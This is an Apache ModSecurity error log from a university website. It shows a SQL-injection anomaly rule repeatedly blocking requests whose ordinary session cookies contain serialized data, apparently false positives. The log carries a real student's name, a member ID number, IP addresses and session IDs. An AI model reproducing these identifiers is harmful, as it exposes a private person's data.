[Mon Aug 28 23:54:57.770511 2023] [:error] [pid 55747] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOzRYcCo-f0AANnDyPYAAAAD"]
[Mon Aug 28 23:54:57.903654 2023] [:error] [pid 55747] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOzRYcCo-f0AANnDyPcAAAAD"]
[Mon Aug 28 23:54:58.842561 2023] [:error] [pid 55747] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOzRYsCo-f0AANnDyPgAAAAD"]
[Mon Aug 28 23:54:58.974595 2023] [:error] [pid 55747] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOzRYsCo-f0AANnDyPkAAAAD"]
[Mon Aug 28 23:55:17.043829 2023] [:error] [pid 55746] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOzRdcCo-f0AANnCdG4AAAAM"]
[Mon Aug 28 23:55:17.542184 2023] [:error] [pid 55746] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOzRdcCo-f0AANnCdG8AAAAM"]
[Mon Aug 28 23:55:22.214462 2023] [:error] [pid 55746] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOzResCo-f0AANnCdHAAAAAM"]
[Mon Aug 28 23:56:01.217276 2023] [:error] [pid 55747] [client 168.235.206.126] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22262a80182278b37ba069e815ead56a72\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22168.235.206.126\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; U; Android 10; en-US; Redmi 8 \\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241761\\x22;}f40109b8daa6f113aa23f6ec9a05b110"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOzRocCo-f0AANnDyP0AAAAD"]
[Mon Aug 28 23:56:01.404932 2023] [:error] [pid 55744] [client 168.235.206.126] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22262a80182278b37ba069e815ead56a72\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22168.235.206.126\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; U; Android 10; en-US; Redmi 8 \\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241761\\x22;}f40109b8daa6f113aa23f6ec9a05b110"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOzRocCo-f0AANnAl9YAAAAF"]
[Mon Aug 28 23:56:01.411964 2023] [:error] [pid 55793] [client 168.235.206.126] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22262a80182278b37ba069e815ead56a72\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22168.235.206.126\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; U; Android 10; en-US; Redmi 8 \\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241761\\x22;}f40109b8daa6f113aa23f6ec9a05b110"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOzRocCo-f0AANnxyM0AAAAN"]
[Mon Aug 28 23:56:01.442458 2023] [:error] [pid 55746] [client 168.235.206.126] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22262a80182278b37ba069e815ead56a72\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22168.235.206.126\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; U; Android 10; en-US; Redmi 8 \\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241761\\x22;}f40109b8daa6f113aa23f6ec9a05b110"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOzRocCo-f0AANnCdHMAAAAM"]
[Mon Aug 28 23:56:02.479895 2023] [:error] [pid 55877] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22262a80182278b37ba069e815ead56a72\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22168.235.206.126\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; U; Android 10; en-US; Redmi 8 \\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241761\\x22;}f40109b8daa6f113aa23f6ec9a05b110"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOzRosCo-f0AANpFqQoAAAAR"]
[Mon Aug 28 23:56:02.480794 2023] [:error] [pid 55878] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22262a80182278b37ba069e815ead56a72\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22168.235.206.126\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; U; Android 10; en-US; Redmi 8 \\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241761\\x22;}f40109b8daa6f113aa23f6ec9a05b110"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOzRosCo-f0AANpGP5gAAAAS"]
[Mon Aug 28 23:56:02.540648 2023] [:error] [pid 55878] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22262a80182278b37ba069e815ead56a72\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22168.235.206.126\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; U; Android 10; en-US; Redmi 8 \\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241761\\x22;}f40109b8daa6f113aa23f6ec9a05b110"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOzRosCo-f0AANpGP5kAAAAS"]
[Mon Aug 28 23:56:03.138762 2023] [:error] [pid 55879] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22262a80182278b37ba069e815ead56a72\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22168.235.206.126\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; U; Android 10; en-US; Redmi 8 \\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241761\\x22;}f40109b8daa6f113aa23f6ec9a05b110"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOzRo8Co-f0AANpHjUMAAAAT"]
[Mon Aug 28 23:56:03.387138 2023] [:error] [pid 55879] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22262a80182278b37ba069e815ead56a72\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22168.235.206.126\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; U; Android 10; en-US; Redmi 8 \\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241761\\x22;}f40109b8daa6f113aa23f6ec9a05b110"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOzRo8Co-f0AANpHjUQAAAAT"]
[Mon Aug 28 23:56:19.030743 2023] [:error] [pid 55878] [client 168.235.206.126] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22262a80182278b37ba069e815ead56a72\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22168.235.206.126\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; U; Android 10; en-US; Redmi 8 \\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241761\\x22;}f40109b8daa6f113aa23f6ec9a05b110"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOzRs8Co-f0AANpGP5oAAAAS"]
[Mon Aug 28 23:56:19.371856 2023] [:error] [pid 55875] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22262a80182278b37ba069e815ead56a72\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22168.235.206.126\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; U; Android 10; en-US; Redmi 8 \\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241761\\x22;}f40109b8daa6f113aa23f6ec9a05b110"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOzRs8Co-f0AANpDyPUAAAAP"]
[Mon Aug 28 23:56:20.373568 2023] [:error] [pid 55748] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22262a80182278b37ba069e815ead56a72\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22168.235.206.126\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; U; Android 10; en-US; Redmi 8 \\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241761\\x22;}f40109b8daa6f113aa23f6ec9a05b110"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOzRtMCo-f0AANnEOjgAAAAB"]
